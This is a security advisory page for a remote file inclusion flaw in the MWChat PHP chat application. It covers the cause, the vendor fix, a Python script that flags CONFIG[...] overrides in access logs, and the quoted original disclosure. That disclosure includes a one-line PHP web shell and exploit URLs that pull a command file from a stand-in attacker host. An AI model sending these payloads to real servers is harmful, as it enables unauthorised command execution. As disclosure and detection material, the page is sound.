SecurityTracker.com
Category:  Application (Instant Messaging/IRC/Chat)  >  MWChat
Vendors:  AppIndex
MWChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014090
SecurityTracker URL:  http://securitytracker.com/id?1014090
CVE Reference:  CAN-2005-1869
Updated:  Jun 9 2005
Original Entry Date:  Jun 2 2005
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 6.8
Description:  Status-x reported a vulnerability in MWChat. A remote user can execute arbitrary commands on the target system.

The 'start_lobby.php' script includes the 'chat_maintainance.php' script relative to the user-supplied '$CONFIG[MWCHAT_Libs]' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname%20-a

The original advisory is available at:

http://www.defacers.com.mx/advisories/4.txt

[Editor's note: The vendor's distribution includes default '.htaccess' files for several directories, including the 'libs' directory. Only systems where the '.htaccess' file has been removed or modified are affected.]
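
The request pattern described above leaves a recognizable trace in web server access logs: a query parameter named 'CONFIG[...]', usually carrying a URL as its value. The following Python example is added here and is not part of the original advisory or the vendor's code; the log lines are constructed samples in Common Log Format, and the function and field names are hypothetical. It inspects query-string parameters only.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (Common Log Format); all hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jun/2005:10:00:01 -0500] "GET /mwchat/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Jun/2005:10:00:05 -0500] "GET /mwchat/libs/start_lobby.php'
    '?CONFIG[MWCHAT_Libs]=http://remote.example/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [02/Jun/2005:10:00:09 -0500] "GET /mwchat/libs/start_lobby.php'
    '?CONFIG%5BMWCHAT_Libs%5D=ftp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 403 210',
    '192.0.2.44 - - [02/Jun/2005:10:01:00 -0500] "GET /mwchat/chat.php?CONFIG[Theme]=blue HTTP/1.1" 200 900',
]

# Captures: client, method, request target, status code.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Parameter names that address the application's CONFIG array.
CONFIG_PARAM_RE = re.compile(r'^CONFIG\[[^\]]*\]$')
# Values that start with a URL scheme, i.e. would point an include off the local disk.
REMOTE_VALUE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def find_config_overrides(lines):
    """Return one finding per query parameter that tries to set CONFIG[...]."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        client, _method, target, status = match.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes names and values, so CONFIG%5B...%5D is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if CONFIG_PARAM_RE.match(name):
                findings.append({
                    "client": client,
                    "path": path,
                    "param": name,
                    "remote": bool(REMOTE_VALUE_RE.match(value)),
                    # 2xx means the script was served; 403 is what a deny rule such
                    # as the default '.htaccess' would typically return (assumption).
                    "served": status.startswith("2"),
                })
    return findings


if __name__ == "__main__":
    for finding in find_config_overrides(SAMPLE_LOG):
        print(finding)
```

A finding with both "remote" and "served" set is the case to investigate first; a 403 on the same request indicates the access restriction on the 'libs' directory was still in place.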

Impact:  A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:  The vendor has issued a fixed version (6.8), available at:

http://www.appindex.net/products/detail/?product=mwchat

Vendor URL:  www.appindex.net/products/detail/?product=mwchat
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Status-x <phr4xz@gmail.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 1 Jun 2005 19:42:03 -0500
From:  Status-x <phr4xz@gmail.com>
Subject:  MW Chat Remote File Include

 
 
#####################################################################
MW CHAT Version 6.xx Remote File Include
Affected Script: start_lobby.php
Vendor: http://www.appindex.net
Vendor Response: None, I suppose, because the site has not been updated since 2003
Vendor Confirmed: No, but I confirmed  ;)
 
http://www.defacers.com.mx/advisories/4.txt - Advisory #4
 
Author: Status-x             E-mail: phr4xz@gmail.com
 
####################################################################
 
====================================================================
 
 
Description:
 
MW CHAT is a free chat system which allows users to communicate with
emoticons, colors and with a good visual design.
 
 
====================================================================
 
 
Vulnerability Description:
 
 
The bug is inside the "libs" DIR and is also located in other files,
but in the other files the vulnerability cannot be confirmed.

Let's take a look into the start_lobby.php source:

*********************************************************************
$Sequence = $STATUS[CLIENT_IP];
$Sequence_Check = base64_encode($Sequence);
include("$CONFIG[MWCHAT_Libs]/chat_maintainance.php");
$rgLobby_SELECT = db_query(Validate(3), $CONN);
$szResult = db_numrows($rgLobby_SELECT);
if ($szResult == "0")
*********************************************************************

And as we can see, in all the source code the $CONFIG[MWCHAT_Libs]
variable is not defined, so we can make a cmd.txt file with the next
source
 
 
***************
 
<?
 
system($cmd)
 
?>
 
***************
 
 
Then we upload that file into a webserver and can execute *NIX CMD
into the affected server or site

http://silly.com/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evil/cmd.txt?&cmd=uname -a
 
 
And we will get a nice answer from the affected server
 
 
*******************************************************
 
Linux ass 2.4.29-rc1 #1 SMP Fri Jan 7 17:47:33 MST 2005
 
*******************************************************
 
 
====================================================================
 
 
How to Fix:
 
 
The vendor didn't reply, but I suppose that by changing the affected source
to the next one the trouble should be corrected  ;)

*********************************************************************
$Sequence = $STATUS[CLIENT_IP];
$Sequence_Check = base64_encode($Sequence);
include("/libs/chat_maintainance.php");
$rgLobby_SELECT = db_query(Validate(3), $CONN);
$szResult = db_numrows($rgLobby_SELECT);
if ($szResult == "0")
*********************************************************************
*********************************************************************
 
 
Or xD hehehe try to contact the vendor  ;) 
 
 
====================================================================
 
 
Credits and Contact:
 
 
This vulnerability was discovered by Status-x | phr4xz@gmail.com
 
 
http://www.defacers.com.mx
 
 
01 June 2005
 
====================================================================
 



Copyright 2005, SecurityGlobal.net LLC